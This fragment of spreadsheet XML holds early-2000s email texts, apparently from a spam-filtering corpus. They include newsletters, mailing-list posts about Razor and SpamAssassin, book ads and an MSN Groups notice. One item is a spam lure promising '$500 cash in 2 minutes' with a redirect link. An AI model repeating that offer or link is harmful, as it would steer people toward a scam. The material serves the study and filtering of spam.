  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download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href="http://clickthru.online.com/Click?q=d2-THo_QULs_DvcAlf3Gl22vbAOyenR" &gt;
 &lt;b&gt;Software contracts: Clause for alarm&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Be wary of fine print. Learn to spot &lt;b&gt;red flags&lt;/b&gt; in corporate software contracts before you sign on the dotted line.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size="-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVce3AIRbVVqS8CMB0qvseR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/040802_monitors.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwTau9La-ra9-0t3VVat9yR" style="text-decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
 Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPLumB-EX3VynhNBuCqlR" style="text-decoration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Monitors&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMxeleLOYuBBBkqU8niQ74R" style="text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdxKvGdWEeFPcZsjpRp-LrR" style="text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0cwZWbFlXASOnO8CtmMgRR" style="text-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=65-K82zIDP9dgic7DXD70VOf0m8P9ZR" style="text-decoration:none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPB8prAmlS7hU6coezkBZXdR" style="text-decoration:none"&gt;Samsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IMRh3ybPpVb8HYULuonXiR" style="text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_wmjbxsIC1b2OB8OEPR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpJTWYQNJwxhOmI_uIUEknR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw8dIX_JaylIO7r3fxeR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jK69mII81u0PT_Qv1yR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOPEQl1uKGSM_svdGheo-lR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;/b&gt;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href='http://clickthru.online.com/Click?q=0e--e3TznQuupZWG3gTQ1cnHdvA6GQwW9RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=23-sFcGINMjnMu1JOaiAv2Y9ZZvQKrR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjIiVpW2AXfCGLs-y39w-_lR"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href="http://clickthru.online.com/Click?q=4e-0Y95InZ3aFMoY0pIKlsTn8N_Jj9R" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWGwVXck_6g_9-hwkp_WEcR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUkHp7nWOl5vnMUN5xspoRR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvyaesXmIiSupcptbPMPR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFg3AixB9R0CGk_HtsonR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JHO5RflOY0NpbnpTbdL3eR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsJFTK2vn2FjAi_TOlRfXPR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyI69pqKbDENBEZdihv9KnR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfscKTR7TWEpiaRL6DCwoliR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=0d-3a5unDr3Rb7FCoV756XJrJ8XisRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] unable to connect to ubik or apt
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_010B_01C23C66.BD4B88D0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 "connection refused" .... currently I am only able to connect to =
 honor[.cloudmark.com] and am suffering a high rate of timeouts as a =
 result. Is there a problem with the other two servers?????
 Sven
 ------=_NextPart_000_010B_01C23C66.BD4B88D0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ece9d8&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;"connection refused" .... currently I =
 am only able=20
 to connect to honor[.cloudmark.com] and am suffering a high rate of =
 timeouts as=20
 a result. Is there a problem with the other two =
 servers?????&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Sven&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_010B_01C23C66.BD4B88D0--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: GET OVER $500 CASH in 2 minutes!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by  (mike@winners.com) on Tuesday, July 30, 19102 at 03:48:23
 ---------------------------------------------------------------------------
 message: GET OVER $500 DOLLARS CASH!!! Just Click Here!!!! - http://www.reelten.com/redirect/500/index.htm -     If you have received this Email in error please contact: lon_chaney_jr@hotmail.com with subject: remove. 
 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] Getting yourself removed from spam lists
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; -----Original Message-----
 &gt; From: carlo@alinoe.com [mailto:carlo@alinoe.com]
 &gt; Sent: 13 September 2002 14:21
 &gt; To: spamassassin-talk@example.sourceforge.net
 &gt; Subject: [SAtalk] Getting yourself removed from spam lists
 &gt;
 &gt; I get the feeling that the spammers never
 &gt; remove emails from their lists.
 Correct...
 &gt; On the other hand, that doesn't make sense:
 &gt; wouldn't they get worried about their millions
 &gt; of spams being wasted?  Don't they WANT *some*
 &gt; prove that they indeed *reach* people somehow?
 No, they only have to prove that they send several million
 emails to 'potential clients' to get their money.  I don't think
 they even care much about bounces.  They're con-artists, why
 should they care about proving they actually reached people?
 &gt; So... it seems to me that they DO clean up
 &gt; their lists, but only when a spam fails to
 &gt; deliver - or can't they detect that?
 Most of the time the bounce goes to some poor soul who has
 nothing to do with the spammer.
 &gt; What do spammers do with email addresses in
 &gt; their database that are undeliverable for a
 &gt; few years?  Do they still continue to spam
 &gt; them?
 Yes.
 Tony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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman &lt;geege@barrera.org&gt; writes:
     G&gt; ...  i'm sure it's some neurochemical process initiated during
     G&gt; the dream that is still cycling thru - like a deja vu,
     G&gt; triggered by memory processes, where you don't actually
     G&gt; remember but you feel like you're remembering.
 That's very perceptive of you.  Many people are not so willing to
 accept their personal reality as skewed by their neuro-physiology.  A
 great many popular con games exist by exploiting the perceptions of
 these states.
 Another oft-exploited neuro-plausibility: The brain is a pretty darn
 fine analog associative computer, so it could be the neurochemical
 events during the dream have associated themselves with some inner or
 external cue to mentally _recreate_ the state-perception like the
 predictable tone on striking a bell.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: JavaServer Pages updated
</t>
  </si>
  <si>
    <t xml:space="preserve">Filled with useful examples and the depth, clarity, and 
 attention to detail that made the first edition so popular 
 with web developers, the just-released "JavaServer Pages,  
 2nd Edition" (Bergsten, $44.95) is completely revised 
 and updated to cover the substantial changes in the 
 1.2 version of the JSP specifications, and includes 
 coverage of the new JSTL Tag libraries--an eagerly 
 anticipated standard  set of JSP elements for the tasks  
 needed in most JSP  applications, as well as thorough 
 coverage of Custom Tag Libraries.  
 What people said about the first edition:
 "an excellent printed resource on JSPs...I have 
 been extremely impressed by its depth, clarity,
  and attention to detail. " 
 --Reuven M. Lerner, Linux Journal
 "This is a great book: it was written by a key 
 contributor not only to the JSP specification, 
 but also to the JSP and  Servlet reference 
 implementations. Filled with useful examples,
  it stands as an important text in the adoption of 
 JSP in the market." 
 --Eduardo Pelegri-Llopart, lead JSP Specification Engineer.
 To order your copy or for more information, see:
 http://www.oreilly.com/catalog/jserverpages2/?CMP=7337
 or call 1-800-998-9938
 or email orders@oreilly.com
 JavaServer Pages, 2nd Edition  
 By Hans Bergsten
 0-596-00317-X, Order Number: 317X
 684 pages, $44.95 US $69.95 CA £31.95 UK
 -----------------------------------------------------------------
 If you want to cancel a subscription to this newsletter,
 go to http://www.oreillynet.com/cs/user/home and 
 de-select any newsletters you no longer wish to receive.
 For non-automated human help email help@oreillynet.com
 -----------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: REQ: Beast/BSE
</t>
  </si>
  <si>
    <t xml:space="preserve">http://beast.gtk.org
 There's a realy nasty shortage on sequencers :(
 (Actually I'd like this running on my main box, which is Irix but that
 I'll probably try to tackle myself :)
 -- 
 Rule #1: All software sucks
 Rule #2: All hardware sucks.
 Rule #3: My vacuum-cleaner is hardware. It never obeys rule #2?
 		-- Tanuki the Raccoon-dog, Scary Devil Monastery
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_106262_01C241DC.868B93A0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 We attempted to deliver this message to you with HTML formatting. =
 However, your e-mail program does not support HTML-enhanced messages. =
 Please go to your E-mail Settings for this group and change your E-mail =
 Preference to "Text only".
 http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw
 MSN Groups
 ------=_NextPart_000_106262_01C241DC.868B93A0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
   &lt;HTML&gt;
 &lt;HEAD&gt;
   &lt;META http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=3D#FFFFFF leftmargin=3D"0" rightmargin=3D"0" =
 bottommargin=3D"0" topmargin=3D"0"&gt;&lt;BASEFONT face=3D"Arial, Helvetica, =
 Sans Serif" size=3D2&gt;
 &lt;STYLE type=3Dtext/css&gt;
 /* Foreground colors */
 .ThmFgColumnHeader, A.FrameLink, A.HeaderLink, A.FooterLink, A.LgtCmd, =
 A.MSNLink {color:#FFFFFF;}
 .ThmFgTitleLightBk {color:#FF6600;}
 .ThmFgNavLink, A.NavLink, A.ChildLink:hover {color:#666699;}
 .ThmFgInactiveText, A.SystemLink {color: #666666;}
 .ThmFgFrameTitle {color: #FFFFCC;}
 .ThmFgTitleDarkBk, A.NavLink:hover, A.TitleLink {color: #CC6600;}
 .ThmFgMiscText, A.Cat, A.SubCat {color: #336699;}
 .ThmFgCommand, A.Command, A.LargeCommand, A.MsgLink {color: #003366;}
 .ThmFgHeader {color: #333333;}
 .ThmFgStandard, A.SystemLink:hover, A.SubLink, A.ChildLink, A.StdLink, =
 SELECT.Standard {color: #000000;}
 .ThmFgDivider {color: #CCCCCC;} /* primarily for HR tags */
 /* Background colors */
 .ThmBgStandard {background-color: #FFFFFF;}
 .ThmBgUnknown1 {background-color: #FF6600;}
 .ThmBgFraming {background-color: #666699;}
 .ThmBgUnknown2 {background-color: #666666;}
 .ThmBgHighlightDark {background-color: #FFFFCC;}
 .ThmBgHighlightLight, #idToolbar {background-color: #FFFFE8;}
 .ThmBgTitleDarkBk {background-color: #F1F1F1;}
 .ThmBgAlternate {background-color: #ECF1F6;}
 .ThmBgUnknown3 {background-color: #CCCCFF;}
 .ThmBgDivider {background-color: #CCCCCC;}
 .ThmBgHeader {background-color: #9999CC;}
 .ThmBgLinks {background-color: #8696C9;}
 .ThmBgSharkBar {background-color: #8696C9;}
 &lt;/STYLE&gt;
 &lt;IMG border=3D0 width=3D1 height=3D1 =
 src=3D"http://c.msn.com/c.gif?NC=3D9523&amp;NA=3D34131&amp;PS=3D&amp;PI=3D26283&amp;DI=3D=
 416&amp;TP=3Dhttp://groups.msn.com"&gt;&lt;TABLE border=3D0 cellpadding=3D0 =
 cellspacing=3D0 width=3D"100%" class=3DThmBgAlternate&gt;
   &lt;TR valign=3D"middle"&gt;
     &lt;TD&gt;&lt;IMG align=3D"middle" border=3D"0" =
 src=3D"http://sc.communities.msn.com/themes/pby/img/mail/mlstar.gif"&gt;&lt;/TD=
 &gt;
     &lt;TD width=3D100%&gt;&lt;FONT face=3DArial, Helvetica, Sans Serif =
 class=3DThmFgTitleLightBk size=3D"4"&gt;New Message on &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving"&gt;One Income =
 Living&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD colspan=3D2 width=3D"100%" height=3D"1" =
 colspan=3D"2"&gt;&lt;IMG border=3D"0" =
 src=3D"http://sc.communities.msn.com/img/c.gif" width=3D"100%" =
 height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;
 &lt;BLOCKQUOTE&gt;
       &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Dshowdiscussion&amp;parent=3D1&amp;item=3D1396"&gt;&lt;B&gt;&lt;FONT =
 face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgTitleLightBk =
 size=3D"2"&gt;Hi! I&amp;#39;m new here.&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;
     &lt;BR&gt;=09
     &lt;TABLE class=3DThmBgAlternate border=3D1 cellspacing=3D0 =
 cellpadding=3D2&gt;
       &lt;TR class=3DThmBgAlternate&gt;&lt;TD align=3Dcenter =
 background=3D"http://sc.communities.msn.com/themes/pby/img/mb/reply_bg.gi=
 f" nowrap&gt;&lt;A =
 href=3D"mailto:OneIncomeLiving@groups.msn.com?subject=3DRe%3A%20Hi%21%20I=
 %27m%20new%20here%2E" title=3D"Send a reply to this message."&gt;&lt;FONT =
 face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Reply&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG border=3D0 width=3D80 =
 height=3D1 src=3D"http://sc.communities.msn.com/img/c.gif"&gt;&lt;/TD&gt;&lt;TD =
 width=3D100%&gt;
           &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0&gt;
             &lt;TR&gt;
                &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
                &lt;TD align=3Dleft width=3D100%&gt;&lt;FONT size=3D"1"&gt;
 		          &lt;A =
 href=3D"mailto:abcusa88@hotmail.com?subject=3DRe%3A%20Hi%21%20I%27m%20new=
 %20here%2E" title=3D"Send a reply to the sender of this message."&gt;&lt;FONT =
 face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Reply to Sender&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 		          &amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_notifications.msnw?type=3D=
 msg&amp;action=3Drecommend&amp;parent=3D1&amp;item=3D1412" title=3D"Increase the =
 number of recommendations for this message."&gt;&lt;IMG align=3Dmiddle =
 border=3D0 height=3D16 hspace=3D3 width=3D16 =
 src=3Dhttp://sc.communities.msn.com/themes/pby/img/mb/recommend.gif&gt;&lt;FONT=
  face=3D"Verdana,Arial,Helvetica,Sans Serif" class=3DThmFgCommand =
 size=3D"1"&gt;&lt;B&gt;Recommend&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;
 			      &lt;/TD&gt;
                   &lt;TD align=3Dright nowrap&gt;&lt;FONT size=3D"1"&gt;Message 11 =
 in Discussion&lt;/FONT&gt;
                &lt;/TD&gt;                                =20
 		    &lt;/TR&gt;
 		  &lt;/TABLE&gt;
         &lt;/TD&gt;
       &lt;/TR&gt;&lt;TR&gt;        	   =20
         &lt;TD colspan=3D2&gt;&lt;TABLE border=3D0 cellpadding=3D4 =
 cellspacing=3D0 width=3D100%&gt;
 		    &lt;TR&gt;&lt;TD class=3DThmBgHighlightLight&gt;
 		      &lt;FONT face=3D"Arial, Helvetica, Sans Serif" =
 class=3DThmFgInactiveText size=3D"2"&gt;From: &lt;/FONT&gt;
 			  &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/profile?user=3Djoyful" =
 title=3D"View Member Information of sender."&gt;&lt;FONT face=3D"Arial, =
 Helvetica, Sans Serif" class=3DThmFgMiscText =
 size=3D"2"&gt;joyful&lt;/FONT&gt;&lt;/A&gt;
 			&lt;/TD&gt;&lt;/TR&gt;
 			&lt;TR&gt;&lt;TD class=3DThmBgStandard&gt;
 			  &lt;BR&gt;
               &lt;DIV&gt;Thank you for all the advice. Currently I'm trying to =
 saving enough for emergency funds. I will not invest any more than I =
 already had. I'll definetely check out rates for CD and savings. =
 Thanks!&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
 		  &lt;/TABLE&gt;
 		&lt;/TD&gt;
       &lt;/TR&gt;
           &lt;/TABLE&gt;
   &lt;BR&gt;
     &lt;A href=3D"http://groups.msn.com/Browse?CatId=3D134"&gt;View other =
 groups in this category.&lt;/A&gt;
   &lt;BR&gt;
   &lt;BR&gt;
       &lt;!--WSSTRIPPABLEBEGIN--&gt;
     &lt;a =
 href=3D"http://g.msn.com/0ADW/24711.1?!12679&amp;amp;&amp;amp;UIT=3D&amp;amp;TargetID=
 =3D50010&amp;amp;CtxID=3D2&amp;amp;PID=3D232420&amp;amp;AN=3D12679" target=3D"_top" =
 &gt;&lt;img =
 src=3D"http://view.atdmt.com/avenuea/view/msnnkhac001468x60wbcmon00003ave=
 /direct/01/time=3D12679" alt=3D"MSN" border=3D"0" width=3D"468" =
 height=3D"60" &gt;&lt;/a&gt;    &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;&lt;P&gt;&lt;STYLE&gt;&lt;!--
 ADMSmLnk{font-family:verdana,system;color:#336699;text-decoration:none;}
 ADMSmLnk:hover{color:#ff6600;text-decoration:underline;}
 --&gt;&lt;/STYLE&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D500 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face=3Dverdana color=3D#333366 size=3D1&gt;&lt;B&gt;Also on =
 MSN:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_01"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Start Chatting&lt;/FONT&gt;&lt;/A&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_02"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Listen to Music&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_03"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;House &amp;amp; Home&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT =
 face=3Dverdana color=3D#333366 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A =
 class=3DADMSmLnk href=3D"http://g.msn.com/2GRENUS/2_8085_04"&gt;&lt;FONT =
 face=3Dverdana color=3D#336699 size=3D1&gt;Try Online =
 Dating&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana color=3D#336699 =
 size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;FONT face=3Dverdana color=3D#333366 =
 size=3D1&gt;|&lt;/FONT&gt;&amp;nbsp;&lt;A class=3DADMSmLnk =
 href=3D"http://g.msn.com/2GRENUS/2_8085_05"&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;Daily Horoscopes&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3Dverdana =
 color=3D#336699 size=3D1&gt;&lt;/FONT&gt;=20
 &lt;TD&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;!--WSSTRIPPABLEEND--&gt;&lt;/BLOCKQUOTE&gt;
 &lt;!--WSSTRIPPABLEBEGIN--&gt;
 &lt;TABLE border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D"100%"&gt;
   &lt;TR class=3DThmBgDivider&gt;&lt;TD width=3D"100%" height=3D"1""&gt;&lt;img =
 border=3D"0" src=3D"http://sc.communities.msn.com/img/c.gif" =
 width=3D"100%" height=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%" class=3DThmBgAlternate&gt;
       &lt;BLOCKQUOTE&gt;
       &lt;FONT face=3D"Arial, Helvetica, Sans Serif" class=3DThmFgStandard =
 size=3D"1"&gt;
         &lt;BR&gt;
                   To stop getting this e-mail, or change how often it =
 arrives, go to your &lt;A =
 href=3D"http://groups.msn.com/OneIncomeLiving/_emailsettings.msnw"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;E-mail Settings&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;&lt;BR&gt;
 		                  Need help? If you've forgotten your password, please =
 go to &lt;A =
 href=3D"http://groups.msn.com/_passportredir.msnw?ppmprop=3Dhelp"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Passport Member Services&lt;/FONT&gt;&lt;/A&gt;.          &lt;BR&gt;
 		                  For other questions or feedback, go to our &lt;A =
 href=3D"http://groups.msn.com/contact"&gt;&lt;FONT =
 class=3DThmFgMiscText&gt;Contact Us&lt;/FONT&gt;&lt;/A&gt; page.          &lt;BR&gt;&lt;BR&gt;
 		                  If you do not want to receive future e-mail from =
 this MSN group, or if you received this message by mistake, please click =
 the "Remove" link below. On the pre-addressed e-mail message that opens, =
 simply click "Send". Your e-mail address will be deleted from this =
 group's mailing list.
           &lt;BR&gt;
             &lt;A href=3D"mailto:OneIncomeLiving-remove@groups.msn.com" =
 title=3D"Send a request to have your e-mail removed from this =
 group."&gt;&lt;FONT class=3DThmFgMiscText&gt;Remove my e-mail address from One =
 Income Living.&lt;/FONT&gt;&lt;/A&gt;
 		      &lt;/BLOCKQUOTE&gt;
     &lt;/TD&gt;
   &lt;/TD&gt;
 &lt;/TABLE&gt;
 &lt;!--WSSTRIPPABLEEND--&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_000_106262_01C241DC.868B93A0--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-10-09 at 06:48, Frank Bergmann wrote:
 &gt; 
 &gt; A more reasonable explication of the EU - US differences (according 
 &gt; to some American journalist cited in a German magazine, can someone
 &gt; help me?) is that the American public perceives the rest of the world 
